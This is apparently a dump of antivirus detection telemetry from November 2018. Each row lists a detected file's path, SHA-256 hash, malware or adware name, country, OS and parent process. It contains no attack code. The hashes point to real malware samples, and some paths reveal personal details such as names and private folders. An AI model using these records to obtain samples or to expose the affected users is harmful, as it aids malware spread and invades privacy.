  Row(detection=Row(filename='tmp0001ec7a', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec7a', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C02090A7376A36A814CB0AE174DC9E13182471810320EA47EDDE1AD03990ABF7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T08:59:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-181448-b89d4d68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45312470\\AVSCAN-20181104-180213-22BA0E1F\\AVSCAN-20181104-181448-B89D4D68', filesize=1856000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='a0d9ae35f724d70176fa6cf496c8a9f270dc39c3b9d0fa4fd003fce249cdfcfe', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a28c4', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a28c4', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:08:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='عبد الرحمن.exe', filepath='d:\\خاص\\مدرسة\\أمتحانات\\عبد الرحمن\\عبد الرحمن.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:54:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ag64.dll', filepath='\\\\?\\C:\\AdwCleaner\\quarantine\\files\\avzqmxxgxtoccgozkulxiodkhxoxpsxv\\_ALLOWDEL_2bfbe1e\\Ag64.dll', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:13:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000045', filepath='C:\\Windows\\Temp\\tmp0000030b\\tmp00000045', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T18:44:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad5326a.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\low\\rad5326a.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=302592, timestamp='2018-11-04T18:43:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T10:35:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:58:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d374', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d374', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212055-393509ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212055-393509AB', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:20:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9560d2w.exe', filepath='D:\\ISMAEL\\9560D2W.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:28:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gemx3201.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Real\\RCAPlugins\\gemx3201.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='79a95879be8955184fef036740fa0e295e5b49e8916bb39fe3f32224974adb19', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:25:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:37:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:34:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwn.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\com2.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\dwn.exe', filesize=8000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='c3e96037801179753a4359185f793d195ae9aa07ccdb812c99feafdb1f93c0a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:56:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='handle-x.exe', filepath='H:\\Private\\برمجه\\VB6\\VB Full RAT Codes\\HandleX_RAT\\Handle-X\\Client\\Handle-X.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='66df70a813801e2242e5f9caaa1f953c19acaae43eb97cb23fe8868289610fa6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:39:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0343727.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP435\\A0343727.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='72dcbd7bd6f78b03de185bb2f15b97906220b52ed8e7c1ebc87a1fe08da0b0b9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:34:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:22:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ag64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\uvconvrx_00000000\\Ag64.dll', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:33:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b015da4b86bdf3766e49e52fbca092f3c6a3c8623867799963493c5b203795c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T13:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:18:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pqcloas.exe', filepath='c:\\users\\X\\appdata\\roaming\\pqcloas.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T15:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='266c65c68ca81a3cca49fe76954247c6', filepath='e:\\sample\\20181102_sample\\266C65C68CA81A3CCA49FE76954247C6', filesize=640000, name='TR/Dldr.Agent.ave.#M1.#R1'), hash='7de51a71e7a5c2ed0bf0e70e906030fd23be547e105bfa5cba7af335346d2e37', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:35:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8aee0c128123617110e6239c2ab6ca42e1b862c101be3f5944ff8f1dfe276d8b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eejbxmoe.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\eEJBXmoE.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Google Drive\\minerzec\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T09:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cam.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\CAM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dhl shipment.ace --> dhl shipment.exe', filepath='DHL SHIPMENT.ace --> DHL SHIPMENT.exe', filesize=584000, name='TR/Dropper.VB.b73de8.#M1.#R1'), hash='b73de8b732af32fb43df6569998f4a9b0ee2c681356b0858dffe2f4c5f05ad9c', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='baixaki_opera_vijucf.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Baixaki_opera_VIjUcf.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='8527ceb21de1d07165c27a128c66e4bb4827a95ca6f29aa43683210ac12754c0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskhost.exe', parentsize=None, timestamp='2018-11-02T12:55:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190753-2c90b3a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47829443\\AVSCAN-20181102-183917-EDB97240\\AVSCAN-20181102-190753-2C90B3A3', filesize=384000, name='Adware/AD.Zdengo.A.#M1.#R1'), hash='c76279310e007b844360eb7c0ebfae9a58e5bbf00aba5241503d4affb09d1d1b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T18:07:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvrevamp.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\FVREVAMP\\FVREVAMP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b5798e22548fa0c0a971f2c3386c37e76c7327a5183521d63b2ab53abe7795c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gutterman.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\Gutterman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083225-beaf6548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083225-BEAF6548', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmiadap.exe', filepath='C:\\Windows\\SysWOW64\\wbem\\WMIADAP.exe', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='999113aee6783853d56f3aa40bd524fc567df553aec310c797193704219930d7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsuE72B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sed506.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seD506.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='93ac4746ab48c9e627889c865f929c2318498b1ed11f3157b3d435c21e0511b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075717-f5486f99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-075717-F5486F99', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ca981ba13cdb098634ddd225c3c005ae1d1e2286b37be646f9564e229e87ae1a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_17b648a5.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_17b648a5.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064921-8e379fcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-064921-8E379FCF', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:53:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath='H:\\HBCD\\Programs\\PASSMARKKEYBOARDTEST.EXE', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151435-4884d82e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5cd7636\\AVSCAN-20181102-151108-2B9F4C1F\\AVSCAN-20181102-151435-4884D82E', filesize=576000, name='HEUR/AGEN.1015897.#M1.#R1'), hash='e71e97adc39b1a976bdebfa026ab04d726d101c973e2cbae7ff85a79bc7d4a8a', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='dbd5eeedfaed06df7edc068397c220c6b4ba3e312357041d298fe94eeee1fe3b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:02Z'), dt=datetime.date(2018, 11, 2)),
